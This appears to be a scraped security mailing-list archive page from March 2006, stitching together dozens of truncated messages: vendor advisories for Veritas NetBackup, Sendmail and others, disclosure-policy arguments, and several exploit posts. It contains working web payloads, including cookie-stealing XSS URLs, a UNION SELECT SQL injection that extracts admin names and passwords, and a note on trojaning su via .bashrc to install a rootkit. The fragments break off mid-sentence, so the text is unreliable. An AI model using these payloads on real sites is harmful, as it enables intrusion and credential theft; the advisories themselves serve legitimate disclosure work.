[W]orld [D]efacers Team
==
Summary
eVuln ID: WD00
Vendor: phplivehelper
Vendor's Web Site: www.phplivehelper.com
Software: Live Customer Support Solution
Sowtware's Web Site:
http://www.turnkeywebtools.com/index.php/location/pr
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
3Com/TippingPoint identified multiple buffer overflow vulnerabilities in
daemons running on Veritas NetBackup Master, Media Servers and clients.
See
http://securityresponse.symantec.com/avcenter/security/Content/2006.03.37.h
tml
for full advisory con
ZDI-06-005: Symantec VERITAS NetBackup Volume Manager Buffer Overflow
http://www.zerodayinitiative.com/advisories/ZDI-06-005.html
March 27, 2006
-- CVE ID:
CVE-2006-0989
-- Affected Vendor:
Symantec VERITAS
-- Affected Products:
VERITAS NetBackup v6.0
-- TippingPoint(TM) IPS Customer Protection
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1020-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
March 28th, 2006
ZDI-06-006: Symantec VERITAS NetBackup Database Manager Buffer Overflow
http://www.zerodayinitiative.com/advisories/ZDI-06-006.html
March 27, 2006
-- CVE ID:
CVE-2006-0990
-- Affected Vendor:
Symantec VERITAS
-- Affected Products:
VERITAS NetBackup v6.0
-- TippingPoint(TM) IPS Customer Protecti
TSRT-06-01: Symantec VERITAS NetBackup vnetd Buffer Overflow Vulnerability
http://www.tippingpoint.com/security/advisories/TSRT-06-01.html
March 27, 2006
-- CVE ID:
CVE-2006-0991
-- Affected Vendor:
Symantec VERITAS
-- Affected Products:
VERITAS NetBackup 6.0 Client
VERITAS NetBackup 6.0 Server
> Spoofing is indeed the attack vector and it can also be utilized for
> NTP, ICMP, etc. It is to blame.
>
> Still, DNS is what's being exploited and in my opinion a broken feature
> being exploited needs fixing, or it will be exploited.
What feature of DNS is being exploited, UDP or the fact tha
On Friday, March 24 at 07:05 PM, quoth Dave Korn:
Here is a simple hack to break sudo and su to get free root. Add
this to ~/.bashrc and fill in the following blanks:
* ~/.root_kit/rk_su
Your hacked su to give root on su --now-dammit
* ~/.root_kit/silent_install_root_kit
Your script to silent
* Theo de Raadt:
> What if we ignore your procedures? What if we say no?
You won't be told about bugs in the code you write. It's as simple as
that.
But I don't quite understand why Gadi is so thoroughly offended by the
way how this vulnerability has been handled so far. The patches might
be
I think the people complaining should look at their fears, it appears to me
that they are coming from a position of fear (lack of percieved control over
their systems, etc.) which is leading to anger and hatred that is being
directed outwards (at the closest target which to them is the people
a
On Mar 24, 2006, at 11:17 PM, Theo de Raadt wrote:
I did not decide that OpenSSH should become a critical part of the
internet, or that it should become a virtual monopoly. We made it
free. Again, the community decided to make it Internet
infrastructure.
Now you want to tell us that becau
Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com
Exploit :
XSS :
http://example.com/music/index.php?id='>alert(document.cookie)
http://example.com/music/index.php?action=top&show=5&type='>alert(document.cookie)
http://example.com/music/index.php?action=top&show='>alert(document.cookie)
-= DDSi Security Advisory =-
March 24, 2006
Vendor: Raindance Communications, Inc.
Raindance offers audio and web conferencing solutions for more
effective web meetings.
Integrated web, audio an
Windows XP firewall had improvements after SP2 and it display alerts about
programs trying to listen on a port (acting as a 'server') to the users. It
doesnt display the path for the file nor the last extension, instead, it only
displays its description or name without the final extension.
if
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Chris Thompson wrote:
>Michael Sierchio <[EMAIL PROTECTED]> writes:
>
>>Robert Story wrote:
>>
>>>VG> In the scenario you describe, I cannot see any actual amplification...
>>>
>>>The amplification isn't in the number of hosts responding, but in
packe
Hi,
- As has been pointed out, this is a BETA release, so it's a bit, er, inelegant
to describe this as a flaw in 3.0. Guess I'll have to bump the release number
when we fix this...
- At least this is an implementation flaw, as opposed to the format design flaw
that the good folks at ElcomSoft
Microsoft MSN Hotmail : Cross-Site Scripting Vulnerability
//- Advisory
Program : Microsoft MSN Hotmail
Homepage : http://www.hotmail.com
Discovery: 2006/01/28
Author Contacted : 2006/03/21
Found by : crashfr at sysdream dot com
This Advisory: nono2357 a
[+]Blog Pixel Motion
[+]Sowtware's Web Site:www.pixelmotion.org
[+]founded by Morocco Security Team
[+]creetz
to:SnIpEr_SA,Esp!onLeRaVaGe,CiM-TeaM,Kasparov,nabil,sniper,www.lezr.com and all
muslim [morocco]
[+]http://victim/blog/admin/index.php
[+]user:moroccan-security //you can write any name
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
New eVuln Advisory:
Maian Weblog Multiple SQL Injection Vulnerabilities
http://evuln.com/vulns/101/summary.html
Summary
eVuln ID: EV0101
CVE: CVE-2006-1334
Software: Maian Weblog
Sowtware's Web Site: http://www.maianscriptworld.co.uk/
Versions: 2.0
Critical Leve
New eVuln Advisory:
DSLogin Authentication Bypass Vulnerability
http://evuln.com/vulns/100/summary.html
Summary
eVuln ID: EV0100
CVE: CVE-2006-1238
Software: DSLogin
Sowtware's Web Site: http://dsportal.uw.hu/
Versions: 1.0
Critical Level: Moderate
Type: SQL Inj
--
HYSA-2006-007 h4cky0u.org Advisory 016
--
Date - Mon March 27 2006
TITLE:
==
phpmyfamily v1.4.1 CRLF injection & XSS
SEVERITY:
=
Medium
SOFTWARE:
=
phpmyfami
--
HYSA-2006-006 h4cky0u.org Advisory 015
--
Date - Mon March 27 2006
TITLE:
==
G-Book 1.0 XSS, Possible authentication bypass & mass message flood
SEVERITY:
=
High
SOFT
Cross Site Scripting Attack CanfTool v1.1
=
Description :
Conftool is a Web-based online system that was developed to supports many
administrative tasks of conferences, workshops and seminars. It can help to
make the management of events easier and much
phpAdsNew / phpPgAds security advisory PHPADSNEW-SA-2006-001
Advisory ID: PHPADSNEW-SA-2006-001
Date: 2006-Mar-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
[+]nuked-klan
[+]www.nuked-klan.org
[+]founded By Moroccan Security Team
[+]special 10x to:CiM-TeaM,Esp!onLeRaVaGe,nabil,Dranzelz,SnIpEr_SA,www.lezr.com
[+]exemple
[+]http://[target]/index.php?file=Calendar&m=[sql]&y=2006
[+]have nice day
###
# Www.H4ckerz.coM --- Www.Hackerz.iR #
###
**
Vendor : VGM Forbin
Target Page : resource/products/adm/login.asp
Action : Turn back too default.asp
Exploit :
AkoComment is a well known and widely used add-on for the Mambo and
Joomla Content Management Systems. It allows users to post comments to
articles.
AkoComment 2.0 suffers from an SQL injection vulnerability
(components/com_akocomment/akocomment.php):
# Clear any HTML and SQL injections
$
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
HPSBUX02108 SSRT061133 rev.1 - HP-UX running Sendmail, Remote
Execution
of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted
upon as soon
as possible.
Release Date: 2006-03-25
Last Updated: 2006-03-25
Potential Sec
Hi
Vulnerable: SaphpLesson2.0
http://www.Arabless.com
Exploit :
http://Example.com/lesson/print.php?lessid=[SQL]
Example :
For Name & Passowrd
http://Example.com/lesson/print.php?lessid=-1%20union%20select%20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,
31 matches
Mail list logo